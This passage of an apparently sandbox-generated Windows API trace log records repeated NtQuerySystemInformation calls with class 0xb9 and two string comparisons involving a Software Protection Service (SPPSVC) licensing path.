NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.156] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee50, Length=0x38, ResultLength=0x0) [0295.156] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.156] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ed70, Length=0x28, ResultLength=0x0) [0295.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ed70, Length=0x28, ResultLength=0x0) [0295.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee50, Length=0x38, ResultLength=0x0) [0295.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ecd0, Length=0x20, ResultLength=0x0) [0295.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ec50, Length=0x20, ResultLength=0x0) [0295.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ec50, Length=0x20, ResultLength=0x0) [0295.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ec50, Length=0x20, ResultLength=0x0) [0295.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee50, Length=0x38, ResultLength=0x0) [0295.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ecd0, Length=0x20, ResultLength=0x0) [0295.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ec60, Length=0x20, ResultLength=0x0) [0295.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.162] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ec60, Length=0x20, ResultLength=0x0) [0295.162] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.162] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.162] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.162] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.162] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.162] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.162] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.162] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f0e0, Length=0x50, ResultLength=0x0) [0295.162] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f060, Length=0x28, ResultLength=0x0) [0295.162] _wcsicmp (_String1="SPPSVC\\0ff1ce15-a989-479d-af46-f275c6370663\\2cb19a15-bab2-4fcb-acee-4bde5be207a5", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0295.162] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.163] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.163] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f0e0, Length=0x50, ResultLength=0x0) [0295.163] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.163] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f0e0, Length=0x50, ResultLength=0x0) [0295.163] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.163] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f0e0, Length=0x50, ResultLength=0x0) [0295.163] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.163] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f010, Length=0x38, ResultLength=0x0) [0295.168] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.168] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee40, Length=0x28, ResultLength=0x0) [0295.168] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.168] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.168] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee40, Length=0x28, ResultLength=0x0) [0295.169] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.169] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.169] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee40, Length=0x28, ResultLength=0x0) [0295.169] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.169] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.169] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eeb0, Length=0x28, ResultLength=0x0) [0295.169] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.169] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.169] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f010, Length=0x38, ResultLength=0x0) [0295.169] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.169] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x28, ResultLength=0x0) [0295.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.174] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.174] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x28, ResultLength=0x0) [0295.174] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.174] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.174] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f010, Length=0x38, ResultLength=0x0) [0295.174] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee90, Length=0x20, ResultLength=0x0) [0295.174] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee10, Length=0x20, ResultLength=0x0) [0295.175] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.175] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee10, Length=0x20, ResultLength=0x0) [0295.175] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.175] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee10, Length=0x20, ResultLength=0x0) [0295.175] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.175] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.175] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.175] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.175] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f010, Length=0x38, ResultLength=0x0) [0295.175] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee90, Length=0x20, ResultLength=0x0) [0295.175] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee20, Length=0x20, ResultLength=0x0) [0295.175] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.176] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.176] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.176] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee20, Length=0x20, ResultLength=0x0) [0295.176] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.176] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.176] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.176] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.176] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.176] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.176] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f0e0, Length=0x50, ResultLength=0x0) [0295.176] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f060, Length=0x28, ResultLength=0x0) [0295.176] _wcsicmp (_String1="SPPSVC\\0ff1ce15-a989-479d-af46-f275c6370663\\2cb19a15-bab2-4fcb-acee-4bde5be207a5", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0295.176] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f0e0, Length=0x50, ResultLength=0x0) [0295.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f0e0, Length=0x50, ResultLength=0x0) [0295.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f0e0, Length=0x50, ResultLength=0x0) [0295.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f010, Length=0x38, ResultLength=0x0) [0295.182] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.182] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee40, Length=0x28, ResultLength=0x0) [0295.182] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.182] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.182] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee40, Length=0x28, ResultLength=0x0) [0295.183] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.183] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.183] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee40, Length=0x28, ResultLength=0x0) [0295.183] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.183] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.183] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eeb0, Length=0x28, ResultLength=0x0) [0295.183] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.183] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.183] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f010, Length=0x38, ResultLength=0x0) [0295.183] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.184] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x28, ResultLength=0x0) [0295.186] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.186] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.186] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.234] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.234] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.235] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.235] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x28, ResultLength=0x0) [0295.235] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.235] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.235] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f010, Length=0x38, ResultLength=0x0) [0295.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee90, Length=0x20, ResultLength=0x0) [0295.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee10, Length=0x20, ResultLength=0x0) [0295.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee10, Length=0x20, ResultLength=0x0) [0295.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee10, Length=0x20, ResultLength=0x0) [0295.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f010, Length=0x38, ResultLength=0x0) [0295.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee90, Length=0x20, ResultLength=0x0) [0295.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee20, Length=0x20, ResultLength=0x0) [0295.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.238] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.238] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.238] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee20, Length=0x20, ResultLength=0x0) [0295.238] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.238] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.238] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.238] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.238] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.238] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.240] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ea90, Length=0x50, ResultLength=0x0) [0295.240] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.240] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ea90, Length=0x50, ResultLength=0x0) [0295.240] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.240] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ea90, Length=0x50, ResultLength=0x0) [0295.240] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e980, Length=0x50, ResultLength=0x0) [0295.240] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.240] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e980, Length=0x50, ResultLength=0x0) [0295.240] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.241] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e980, Length=0x50, ResultLength=0x0) [0295.241] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.241] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e980, Length=0x50, ResultLength=0x0) [0295.241] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.241] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e8b0, Length=0x38, ResultLength=0x0) [0295.247] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.247] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e6e0, Length=0x28, ResultLength=0x0) [0295.247] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.247] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.247] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e6e0, Length=0x28, ResultLength=0x0) [0295.247] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.247] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e6e0, Length=0x28, ResultLength=0x0) [0295.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e6e0, Length=0x28, ResultLength=0x0) [0295.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.249] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e750, Length=0x28, ResultLength=0x0) [0295.249] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.249] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.249] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e8b0, Length=0x38, ResultLength=0x0) [0295.250] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.250] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e7d0, Length=0x28, ResultLength=0x0) [0295.254] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.254] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.254] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.254] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e7d0, Length=0x28, ResultLength=0x0) [0295.254] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e670, Length=0x20, ResultLength=0x0) [0295.254] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e5f0, Length=0x20, ResultLength=0x0) [0295.254] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.255] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e5f0, Length=0x20, ResultLength=0x0) [0295.255] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.255] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e5f0, Length=0x20, ResultLength=0x0) [0295.255] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.255] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.255] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.255] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.255] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.255] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e8b0, Length=0x38, ResultLength=0x0) [0295.256] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.256] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e8b0, Length=0x38, ResultLength=0x0) [0295.256] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e730, Length=0x20, ResultLength=0x0) [0295.256] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e6c0, Length=0x20, ResultLength=0x0) [0295.257] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.257] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.257] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.257] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e6c0, Length=0x20, ResultLength=0x0) [0295.257] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.257] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.257] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.257] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.258] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.258] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.258] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.259] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ece0, Length=0x50, ResultLength=0x0) [0295.259] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.259] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ece0, Length=0x50, ResultLength=0x0) [0295.260] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.260] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ece0, Length=0x50, ResultLength=0x0) [0295.260] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ebd0, Length=0x50, ResultLength=0x0) [0295.260] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.260] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ebd0, Length=0x50, ResultLength=0x0) [0295.260] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.260] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ebd0, Length=0x50, ResultLength=0x0) [0295.260] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ebd0, Length=0x50, ResultLength=0x0) [0295.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eb00, Length=0x38, ResultLength=0x0) [0295.269] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.269] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e930, Length=0x28, ResultLength=0x0) [0295.270] NtQuerySystemInformation 